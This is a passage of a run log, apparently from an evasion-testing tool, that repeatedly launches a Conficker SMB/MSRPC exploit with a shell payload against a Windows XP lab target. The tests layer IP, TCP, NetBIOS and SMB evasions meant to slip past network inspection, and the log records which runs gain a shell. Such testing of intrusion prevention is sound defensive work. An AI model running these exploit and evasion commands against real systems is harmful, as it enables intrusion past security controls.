  1904. 3312 runs averaging 1.97 runs / second ; progress: 1685/43200.....Pid 21182 timed out - killed
  1905. 2015-06-07 23:47:38 INFO
  1906. Timed out (10.62.90.118):
  1907. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=18119 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=nYRQiekFQ6c --evasion=[msrpc_bind,end]ipv4_opt,"75%","inc","zero" --evasion=[smb_opentree,smb_openpipe]netbios_chaff,"8","empty_unspec|small_unspec|http_get|http_post|msrpc_req" --evasion=[smb_openpipe,end]tcp_urgent,"1","random_alphanum" --verifydelay=1000 --payload=shell
  1908. Info: Using random seed nYRQiekFQ6e
  1909. The following evasions are applied from stage smb_opentree to smb_openpipe:
  1910. - Before every 8th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is a small NetBIOS message of an unspecified type. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload. The chaff message is an unspecified NetBIOS message with HTTP POST request like payload. The chaff message is an unspecified NetBIOS message with MSRPC request like payload.
  1911. The following evasions are applied from stage smb_openpipe to end:
  1912. - Add a random alphanumeric urgent data byte to every 1 TCP segment.
  1913. The following evasions are applied from stage msrpc_bind to end:
  1914. - 75% probability to send a duplicate IPv4 packet with an incrementing DWORD in the options field.
  1915. The duplicate packet has NULL bytes for payload
  1916.  
  1917. Info: NetBIOS connection 10.62.90.118:18119 -> 10.35.1.207:445
  1918. Terminated
  1919. ..
  1920. 3320 runs averaging 1.96 runs / second ; progress: 1690/43200Pid 21258 timed out - killed
  1921. 2015-06-07 23:47:40 INFO
  1922. Timed out (10.62.90.116):
  1923. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=44993 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=117gBcdU3HQ --evasion=[msrpc_bind,end]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_connect,msrpc_bind]tcp_urgent,"75%","random" --verifydelay=1000 --payload=shell
  1924. Info: Using random seed 117gBcdU3HT
  1925. The following evasions are applied from stage smb_connect to msrpc_bind:
  1926. - 75% probability to add a random urgent data byte to a TCP segment.
  1927. The following evasions are applied from stage msrpc_bind to end:
  1928. - The SMB filename is obfuscated:
  1929. * Dummy paths are added ( a/b -> a/c/../b )
  1930. * A 0x00 and random alphanumeric characters are appended to the filename
  1931.  
  1932. Info: NetBIOS connection 10.62.90.116:44993 -> 10.35.1.207:445
  1933. Terminated
  1934. .......2015-06-07 23:47:44 INFO
  1935. Success. (10.62.90.115):
  1936. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=39878 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=EQRt84k6lTQ --evasion=[smb_connect,msrpc_bind]smb_decoytrees,"2","1","10","random_msrpcreq" --evasion=[smb_connect,end]smb_decoytrees,"2","2","8","random_msrpcreq" --verifydelay=1000 --payload=shell
  1937. Info: Using random seed EQRt84k6lTQ
  1938. The following evasions are applied from stage smb_connect to msrpc_bind:
  1939. - Before normal SMB writes, 2 SMB trees are opened and 1 writes are performed to them. The write payload is 10 bytes of MSRPC request-like data.
  1940. The following evasions are applied from stage smb_connect to end:
  1941. - Before normal SMB writes, 2 SMB trees are opened and 2 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  1942.  
  1943. Info: NetBIOS connection 10.62.90.115:39878 -> 10.35.1.207:445
  1944. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1945. Info: Sending MSRPC request with exploit
  1946. Info: Shell found, attack succeeded
  1947. Info: Shell closed
  1948. 0: Success.
  1949. .
  1950. 3330 runs averaging 1.96 runs / second ; progress: 1695/43200.........
  1951. 3339 runs averaging 1.96 runs / second ; progress: 1700/43200..........
  1952. 3349 runs averaging 1.96 runs / second ; progress: 1705/43200..........
  1953. 3359 runs averaging 1.96 runs / second ; progress: 1710/43200Pid 21568 timed out - killed
  1954. 2015-06-07 23:48:00 INFO
  1955. Timed out (10.62.90.119):
  1956. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=35574 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=b1eDRHpOWxU --evasion=[smb_opentree,msrpc_req]smb_chaff,"25%","write_flag","zero" --evasion=[start,msrpc_req]tcp_paws,"75%","3","random_alpha" --verifydelay=1000 --payload=shell
  1957. Info: Using random seed b1eDRHpOWxV
  1958. The following evasions are applied from stage start to msrpc_req:
  1959. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 3> and has random alpha bytes as payload
  1960. The following evasions are applied from stage smb_opentree to msrpc_req:
  1961. - 25% probability to send an SMB chaff message before real messages. The chaff is a WriteAndX message with a broken write mode flag, and has zeroes for payload
  1962.  
  1963. Info: NetBIOS connection 10.62.90.119:35574 -> 10.35.1.207:445
  1964. Terminated
  1965. ......
  1966. 3366 runs averaging 1.96 runs / second ; progress: 1715/43200.2015-06-07 23:48:06 INFO
  1967. Success. (10.62.90.119):
  1968. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.119 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=11004 --extra=bindport=10009 --verifydelay=200 --obfuscate --randseed=4E57Ty3TjkE --evasion=[start,smb_opentree]ipv4_opt,"3","inc","zero" --evasion=[msrpc_bind,msrpc_req]tcp_paws,"75%","134958172","random_alphanum" --verifydelay=1000 --payload=shell
  1969. Info: Using random seed 4E57Ty3TjkH
  1970. The following evasions are applied from stage start to smb_opentree:
  1971. - Every 3th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1972. The duplicate packet has NULL bytes for payload
  1973. The following evasions are applied from stage msrpc_bind to msrpc_req:
  1974. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 134958172> and has random alphanumeric bytes as payload
  1975.  
  1976. Info: NetBIOS connection 10.62.90.119:11004 -> 10.35.1.207:445
  1977. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  1978. Info: Sending MSRPC request with exploit
  1979. Info: Shell found, attack succeeded
  1980. Info: CommandShell::SendCommand() - Failed to send string
  1981. Info: Command shell connection reset.
  1982. Info: Shell closed
  1983. 0: Success.
  1984. .........
  1985. 3377 runs averaging 1.96 runs / second ; progress: 1720/43200...............
  1986. 3392 runs averaging 1.97 runs / second ; progress: 1725/43200......................
  1987. 3414 runs averaging 1.97 runs / second ; progress: 1730/43200.....Pid 21788 timed out - killed
  1988. 2015-06-07 23:48:21 INFO
  1989. Timed out (10.62.90.114):
  1990. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=60318 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=u0yyOW7fX0Q --evasion=[smb_connect,msrpc_req]ipv4_opt,"21","inc","unmodified" --evasion=[smb_openpipe,end]tcp_urgent,"50%","random_alpha" --verifydelay=1000 --payload=shell
  1991. Info: Using random seed u0yyOW7fX0S
  1992. The following evasions are applied from stage smb_connect to msrpc_req:
  1993. - Every 21th IPv4 packet is duplicated and an incrementing DWORD is added to the options field.
  1994. The duplicate packet has identical payload
  1995. The following evasions are applied from stage smb_openpipe to end:
  1996. - 50% probability to add a random alphaurgent data byte to a TCP segment.
  1997.  
  1998. Info: NetBIOS connection 10.62.90.114:60318 -> 10.35.1.207:445
  1999. Terminated
  2000. ..............
  2001. 3434 runs averaging 1.98 runs / second ; progress: 1735/43200......
  2002. 3440 runs averaging 1.98 runs / second ; progress: 1740/43200......
  2003. 3446 runs averaging 1.97 runs / second ; progress: 1745/43200..........
  2004. 3456 runs averaging 1.97 runs / second ; progress: 1750/43200.....................
  2005. 3477 runs averaging 1.98 runs / second ; progress: 1755/43200.......
  2006. 3484 runs averaging 1.98 runs / second ; progress: 1760/43200....2015-06-07 23:48:55 INFO
  2007. Success. (10.62.90.115):
  2008. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=25246 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=JW20JsGXHvY --evasion=[smb_connect,msrpc_req]smb_decoytrees,"5","3","8","random_msrpcreq" --evasion=[smb_openpipe,end]smb_writeandxpad,"1023","random_alphanum" --verifydelay=1000 --payload=shell
  2009. Info: Using random seed JW20JsGXHvY
  2010. The following evasions are applied from stage smb_connect to msrpc_req:
  2011. - Before normal SMB writes, 5 SMB trees are opened and 3 writes are performed to them. The write payload is 8 bytes of MSRPC request-like data.
  2012. The following evasions are applied from stage smb_openpipe to end:
  2013. - 1023 bytes of padding is inserted into WriteAndX messages between the SMB header and payload. The padding consists of random alphanumeric bytes.
  2014.  
  2015. Info: NetBIOS connection 10.62.90.115:25246 -> 10.35.1.207:445
  2016. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2017. Info: Sending MSRPC request with exploit
  2018. Info: Shell found, attack succeeded
  2019. Info: CommandShell::SendCommand() - Failed to send string
  2020. Info: Command shell connection reset.
  2021. Info: Shell closed
  2022. 0: Success.
  2023.  
  2024. 3489 runs averaging 1.98 runs / second ; progress: 1766/43200.........
  2025. 3498 runs averaging 1.98 runs / second ; progress: 1771/432002015-06-07 23:49:00 INFO
  2026. Success. (10.62.90.110):
  2027. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=56190 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=0a5UmP7w6is --evasion=[smb_openpipe,msrpc_bind]smb_decoytrees,"4","3","8","random" --evasion=[netbios_connect,msrpc_req]tcp_paws,"50%","268435453","random" --verifydelay=1000 --payload=shell
  2028. Info: Using random seed 0a5UmP7w6iv
  2029. The following evasions are applied from stage netbios_connect to msrpc_req:
  2030. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435453> and has random bytes as payload
  2031. The following evasions are applied from stage smb_openpipe to msrpc_bind:
  2032. - Before normal SMB writes, 4 SMB trees are opened and 3 writes are performed to them. The write payload is 8 random bytes.
  2033.  
  2034. Info: NetBIOS connection 10.62.90.110:56190 -> 10.35.1.207:445
  2035. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2036. Info: Sending MSRPC request with exploit
  2037. Info: Shell found, attack succeeded
  2038. Info: Shell closed
  2039. 0: Success.
  2040. 2015-06-07 23:49:01 INFO
  2041. Success. (10.62.90.115):
  2042. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=41902 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=Q5L+wNSEXnI --evasion=[netbios_connect,end]tcp_paws,"50%","9","shuffle" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2043. Info: Using random seed Q5L+wNSEXnJ
  2044. The following evasions are applied from stage netbios_connect to end:
  2045. - 50% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 9> and has shuffled original payload
  2046. The following evasions are applied from stage smb_connect to smb_openpipe:
  2047. - TCP timestamps echo reply value is sent in the wrong endianness
  2048.  
  2049. Info: NetBIOS connection 10.62.90.115:41902 -> 10.35.1.207:445
  2050. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2051. Info: Sending MSRPC request with exploit
  2052. Info: Shell found, attack succeeded
  2053. Info: Shell closed
  2054. 0: Success.
  2055. ............
  2056. 3512 runs averaging 1.98 runs / second ; progress: 1776/43200....2015-06-07 23:49:08 INFO
  2057. Success. (10.62.90.118):
  2058. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=15024 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=95HG3rTHFuU --evasion=[smb_connect,end]tcp_paws,"5","4","random" --evasion=[netbios_connect,msrpc_bind]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2059. Info: Using random seed 95HG3rTHFuX
  2060. The following evasions are applied from stage netbios_connect to msrpc_bind:
  2061. - TCP timestamps echo reply value is sent in the wrong endianness
  2062. The following evasions are applied from stage smb_connect to end:
  2063. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 4> and has random bytes as payload
  2064.  
  2065. Info: NetBIOS connection 10.62.90.118:15024 -> 10.35.1.207:445
  2066. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2067. Info: Sending MSRPC request with exploit
  2068. Info: Shell found, attack succeeded
  2069. Info: Shell closed
  2070. 0: Success.
  2071. ........
  2072. 3525 runs averaging 1.98 runs / second ; progress: 1781/43200.......2015-06-07 23:49:15 INFO
  2073. Success. (10.62.90.114):
  2074. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.114 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=49718 --extra=bindport=10004 --verifydelay=200 --obfuscate --randseed=v9g23QstAps --evasion=[msrpc_req,end]tcp_paws,"1","6","shuffle30" --evasion=[smb_opentree,smb_openpipe]tcp_urgent,"21","random" --verifydelay=1000 --payload=shell
  2075. Info: Using random seed v9g23QstApu
  2076. The following evasions are applied from stage smb_opentree to smb_openpipe:
  2077. - Add a random urgent data byte to every 21 TCP segment.
  2078. The following evasions are applied from stage msrpc_req to end:
  2079. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has 30 bytes of original payload, then shuffled original payload
  2080.  
  2081. Info: NetBIOS connection 10.62.90.114:49718 -> 10.35.1.207:445
  2082. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2083. Info: Sending MSRPC request with exploit
  2084. Info: Shell found, attack succeeded
  2085. Info: Shell closed
  2086. 0: Success.
  2087.  
  2088. 3533 runs averaging 1.98 runs / second ; progress: 1786/43200...
  2089. 3536 runs averaging 1.97 runs / second ; progress: 1791/43200.........
  2090. 3545 runs averaging 1.97 runs / second ; progress: 1796/43200.............
  2091. 3558 runs averaging 1.98 runs / second ; progress: 1801/43200..Pid 22433 timed out - killed
  2092. 2015-06-07 23:49:31 INFO
  2093. Timed out (10.62.90.111):
  2094. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.111 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=64787 --extra=bindport=10001 --verifydelay=200 --obfuscate --randseed=dTcq453vXsM --evasion=[msrpc_bind,msrpc_req]smb_decoytrees,"6","3","5","random_msrpcbind" --evasion=[smb_opentree,msrpc_req]tcp_urgent,"8","zero" --verifydelay=1000 --payload=shell
  2095. Info: Using random seed dTcq453vXsN
  2096. The following evasions are applied from stage smb_opentree to msrpc_req:
  2097. - Add a zero urgent data byte to every 8 TCP segment.
  2098. The following evasions are applied from stage msrpc_bind to msrpc_req:
  2099. - Before normal SMB writes, 6 SMB trees are opened and 3 writes are performed to them. The write payload is 5 bytes of MSRPC bind-like data.
  2100.  
  2101. Info: NetBIOS connection 10.62.90.111:64787 -> 10.35.1.207:445
  2102. Terminated
  2103. ......
  2104. 3567 runs averaging 1.98 runs / second ; progress: 1806/43200....
  2105. 3571 runs averaging 1.97 runs / second ; progress: 1811/43200.....2015-06-07 23:49:45 INFO
  2106. Success. (10.62.90.118):
  2107. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=47268 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=EyGsPHL3uk8 --evasion=[smb_connect,end]ipv4_frag,"64" --evasion=[smb_openpipe,msrpc_req]smb_fnameobf,"add_paths|add_null_trailer" --evasion=[smb_opentree,msrpc_req]tcp_paws,"75%","268435455","random_alpha" --verifydelay=1000 --payload=shell
  2108. Info: Using random seed EyGsPHL3uk8
  2109. The following evasions are applied from stage smb_connect to end:
  2110. - IPv4 fragments with at most 64 bytes per fragment
  2111. The following evasions are applied from stage smb_opentree to msrpc_req:
  2112. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435455> and has random alpha bytes as payload
  2113. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2114. - The SMB filename is obfuscated:
  2115. * Dummy paths are added ( a/b -> a/c/../b )
  2116. * A 0x00 and random alphanumeric characters are appended to the filename
  2117.  
  2118. Info: NetBIOS connection 10.62.90.118:47268 -> 10.35.1.207:445
  2119. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2120. Info: Sending MSRPC request with exploit
  2121. Info: Shell found, attack succeeded
  2122. Info: CommandShell::SendCommand() - Failed to send string
  2123. Info: Command shell connection reset.
  2124. Info: Shell closed
  2125. 0: Success.
  2126. .
  2127. 3578 runs averaging 1.97 runs / second ; progress: 1816/43200.......2015-06-07 23:49:48 INFO
  2128. Success. (10.62.90.115):
  2129. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.115 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=59606 --extra=bindport=10005 --verifydelay=200 --obfuscate --randseed=uzhULV6jsqk --evasion=[start,end]tcp_initialseq,"2412100352" --evasion=[smb_opentree,end]tcp_paws,"5","162865477","shuffle30" --verifydelay=1000 --payload=shell
  2130. Info: Using random seed uzhULV6jsqm
  2131. - Initial TCP sequence number is set to 0xffffffff - 2412100352
  2132. The following evasions are applied from stage smb_opentree to end:
  2133. - Every 5th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 162865477> and has 30 bytes of original payload, then shuffled original payload
  2134.  
  2135. Info: NetBIOS connection 10.62.90.115:59606 -> 10.35.1.207:445
  2136. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2137. Info: Sending MSRPC request with exploit
  2138. Info: Shell found, attack succeeded
  2139. Info: Shell closed
  2140. 0: Success.
  2141. ....2015-06-07 23:49:49 INFO
  2142. Success. (10.62.90.110):
  2143. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.110 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=17836 --extra=bindport=10000 --verifydelay=200 --obfuscate --randseed=cDSiqqCXSA0 --evasion=[netbios_connect,smb_connect]netbios_chaff,"5","empty_unspec|empty_keepalive|http_get" --evasion=[start,end]tcp_paws,"1","6","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_paws,"1","167083599","shuffle" --verifydelay=1000 --payload=shell
  2144. Info: Using random seed cDSiqqCXSA1
  2145. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 6> and has original payload with alphanumeric bytes randomized
  2146. The following evasions are applied from stage netbios_connect to smb_opentree:
  2147. - Every 1th TCP packet is duplicated and sent with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 167083599> and has shuffled original payload
  2148. The following evasions are applied from stage netbios_connect to smb_connect:
  2149. - Before every 5th actual NetBIOS message a chaff message is sent. The chaff message is an empty NetBIOS message of unspecified type. The chaff message is an empty NetBIOS Keep-Alive message. The chaff message is an unspecified NetBIOS message with HTTP GET request like payload.
  2150.  
  2151. Info: NetBIOS connection 10.62.90.110:17836 -> 10.35.1.207:445
  2152. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2153. Info: Sending MSRPC request with exploit
  2154. Info: Shell found, attack succeeded
  2155. Info: Shell closed
  2156. 0: Success.
  2157. .....
  2158. 3596 runs averaging 1.98 runs / second ; progress: 1821/43200...........
  2159. 3607 runs averaging 1.98 runs / second ; progress: 1826/43200.............
  2160. 3620 runs averaging 1.98 runs / second ; progress: 1831/43200............
  2161. 3632 runs averaging 1.98 runs / second ; progress: 1836/43200.......
  2162. 3639 runs averaging 1.98 runs / second ; progress: 1841/43200.
  2163. 3640 runs averaging 1.97 runs / second ; progress: 1846/43200.Pid 23089 timed out - killed
  2164. 2015-06-07 23:50:20 INFO
  2165. Timed out (10.62.90.117):
  2166. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.117 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=24335 --extra=bindport=10007 --verifydelay=200 --obfuscate --randseed=OwJGCORFO5M --evasion=msrpc_bigendian --evasion=[smb_opentree,msrpc_req]tcp_urgent,"2","random" --verifydelay=1000 --payload=shell
  2167. Info: Using random seed OwJGCORFO5M
  2168. The following evasions are applied from stage smb_opentree to msrpc_req:
  2169. - Add a random urgent data byte to every 2 TCP segment.
  2170. The following evasions are applied from stage msrpc_bind to end:
  2171. - MSRPC messages are sent in the big endian byte order
  2172.  
  2173. Info: NetBIOS connection 10.62.90.117:24335 -> 10.35.1.207:445
  2174. Terminated
  2175. ..
  2176. 3644 runs averaging 1.97 runs / second ; progress: 1851/43200...........
  2177. 3655 runs averaging 1.97 runs / second ; progress: 1856/43200..........
  2178. 3665 runs averaging 1.97 runs / second ; progress: 1861/43200..........
  2179. 3675 runs averaging 1.97 runs / second ; progress: 1866/43200..........
  2180. 3685 runs averaging 1.97 runs / second ; progress: 1871/43200........
  2181. 3693 runs averaging 1.97 runs / second ; progress: 1876/43200...............
  2182. 3708 runs averaging 1.97 runs / second ; progress: 1881/43200.........
  2183. 3717 runs averaging 1.97 runs / second ; progress: 1886/43200.....
  2184. 3722 runs averaging 1.97 runs / second ; progress: 1891/43200...2015-06-07 23:51:05 INFO
  2185. Success. (10.62.90.118):
  2186. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.118 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52841 --extra=bindport=10008 --verifydelay=200 --obfuscate --randseed=BoBFFh41OV0 --evasion=[smb_connect,end]smb_decoytrees,"6","7","2","random_msrpcreq" --evasion=[smb_opentree,smb_openpipe]tcp_chaff,"1","chksum|nullchksum|nullflag|shorthdr|longhdr","unmodified" --verifydelay=1000 --payload=shell
  2187. Info: Using random seed BoBFFh41OV0
  2188. The following evasions are applied from stage smb_connect to end:
  2189. - Before normal SMB writes, 6 SMB trees are opened and 7 writes are performed to them. The write payload is 2 bytes of MSRPC request-like data.
  2190. The following evasions are applied from stage smb_opentree to smb_openpipe:
  2191.  
  2192.  
  2193. Info: NetBIOS connection 10.62.90.118:52841 -> 10.35.1.207:445
  2194. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2195. Info: Sending MSRPC request with exploit
  2196. Info: Shell found, attack succeeded
  2197. Info: Shell closed
  2198. 0: Success.
  2199.  
  2200. 3726 runs averaging 1.97 runs / second ; progress: 1896/43200........
  2201. 3734 runs averaging 1.96 runs / second ; progress: 1901/43200......
  2202. 3740 runs averaging 1.96 runs / second ; progress: 1906/43200..
  2203. 3742 runs averaging 1.96 runs / second ; progress: 1911/43200.
  2204. 3743 runs averaging 1.95 runs / second ; progress: 1916/43200....
  2205. 3747 runs averaging 1.95 runs / second ; progress: 1921/43200........
  2206. 3755 runs averaging 1.95 runs / second ; progress: 1926/43200.....
  2207. 3760 runs averaging 1.95 runs / second ; progress: 1931/43200.....
  2208. 3765 runs averaging 1.94 runs / second ; progress: 1936/43200..
  2209. 3767 runs averaging 1.94 runs / second ; progress: 1941/43200
  2210. 3767 runs averaging 1.94 runs / second ; progress: 1946/43200
  2211. 3767 runs averaging 1.93 runs / second ; progress: 1951/43200.Pid 24808 timed out - killed
  2212. 2015-06-07 23:52:06 INFO
  2213. Timed out (10.62.90.113):
  2214. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.113 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=12134 --extra=bindport=10003 --verifydelay=200 --obfuscate --randseed=5K839hgA4vk --evasion=[netbios_connect,smb_opentree]ipv4_frag,"40" --evasion=[smb_opentree,msrpc_bind]tcp_urgent,"2","random_alphanum" --verifydelay=1000 --payload=shell
  2215. Info: Using random seed 5K839hgA4vn
  2216. The following evasions are applied from stage netbios_connect to smb_opentree:
  2217. - IPv4 fragments with at most 40 bytes per fragment
  2218. The following evasions are applied from stage smb_opentree to msrpc_bind:
  2219. - Add a random alphanumeric urgent data byte to every 2 TCP segment.
  2220.  
  2221. Info: NetBIOS connection 10.62.90.113:12134 -> 10.35.1.207:445
  2222. Terminated
  2223.  
  2224. 3769 runs averaging 1.93 runs / second ; progress: 1956/43200.........
  2225. 3778 runs averaging 1.93 runs / second ; progress: 1961/43200.....
  2226. 3783 runs averaging 1.92 runs / second ; progress: 1966/43200..........
  2227. 3793 runs averaging 1.92 runs / second ; progress: 1971/43200...
  2228. 3796 runs averaging 1.92 runs / second ; progress: 1976/43200
  2229. 3796 runs averaging 1.92 runs / second ; progress: 1981/43200Pid 25171 timed out - killed
  2230. 2015-06-07 23:52:33 INFO
  2231. Timed out (10.62.90.112):
  2232. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=52248 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=dytugDvpAqY --evasion=[smb_connect,msrpc_req]tcp_paws,"25%","2","alpharandomized" --evasion=[netbios_connect,smb_opentree]tcp_segvar,"6","65535" --evasion=[smb_connect,smb_openpipe]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2233. Info: Using random seed dytugDvpAqZ
  2234. The following evasions are applied from stage netbios_connect to smb_opentree:
  2235. - TCP packets are segmented to contain between 6 and 65535 bytes of payload.
  2236. The following evasions are applied from stage smb_connect to msrpc_req:
  2237. - 25% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 2> and has original payload with alphabetic bytes randomized
  2238. The following evasions are applied from stage smb_connect to smb_openpipe:
  2239. - TCP timestamps echo reply value is sent in the wrong endianness
  2240.  
  2241. Info: NetBIOS connection 10.62.90.112:52248 -> 10.35.1.207:445
  2242. Terminated
  2243. .....
  2244. 3802 runs averaging 1.91 runs / second ; progress: 1986/43200.2015-06-07 23:52:37 INFO
  2245. Success. (10.62.90.112):
  2246. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.112 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=36884 --extra=bindport=10002 --verifydelay=200 --obfuscate --randseed=s9eB1BzGzzo --evasion=[smb_openpipe,msrpc_req]tcp_paws,"75%","268435454","alphanumrandomized" --evasion=[netbios_connect,smb_opentree]tcp_tsoptreply,"le" --verifydelay=1000 --payload=shell
  2247. Info: Using random seed s9eB1BzGzzq
  2248. The following evasions are applied from stage netbios_connect to smb_opentree:
  2249. - TCP timestamps echo reply value is sent in the wrong endianness
  2250. The following evasions are applied from stage smb_openpipe to msrpc_req:
  2251. - 75% probability to send a duplicate TCP packet with an old timestamp destined for PAWS elimination. The duplicate packet has a timestamp <normal - 268435454> and has original payload with alphanumeric bytes randomized
  2252.  
  2253. Info: NetBIOS connection 10.62.90.112:36884 -> 10.35.1.207:445
  2254. Info: SMB Native OS is "Windows 5.1", targeting Windows XP SP2
  2255. Info: Sending MSRPC request with exploit
  2256. Info: Shell found, attack succeeded
  2257. Info: CommandShell::SendCommand() - Failed to send string
  2258. Info: Command shell connection reset.
  2259. Info: Shell closed
  2260. 0: Success.
  2261. .......
  2262. 3811 runs averaging 1.91 runs / second ; progress: 1991/43200...............
  2263. 3826 runs averaging 1.92 runs / second ; progress: 1996/43200....
  2264. 3830 runs averaging 1.91 runs / second ; progress: 2002/43200........
  2265. 3838 runs averaging 1.91 runs / second ; progress: 2007/43200........
  2266. 3846 runs averaging 1.91 runs / second ; progress: 2012/43200.............
  2267. 3859 runs averaging 1.91 runs / second ; progress: 2017/43200...Pid 25922 timed out - killed
  2268. 2015-06-07 23:53:10 INFO
  2269. Timed out (10.62.90.116):
  2270. /root/evader/evader --uid=mongbat_27081_webgui2_8000 --if=eth0 --src_ip=10.62.90.116 --dst_ip=10.35.1.207 --gw=10.62.90.3 --autoclose --attack=conficker --src_port=54207 --extra=bindport=10006 --verifydelay=200 --obfuscate --randseed=h6bw8nvRfdk --evasion=[msrpc_bind,msrpc_req]tcp_order,"rand" --evasion=[netbios_connect,msrpc_bind]tcp_overlap,"7","new","zero" --evasion=[smb_openpipe,end]tcp_seg,"7" --verifydelay=1000 --payload=shell
  2271. Info: Using random seed h6bw8nvRfdm
  2272. The following evasions are applied from stage netbios_connect to msrpc_bind:
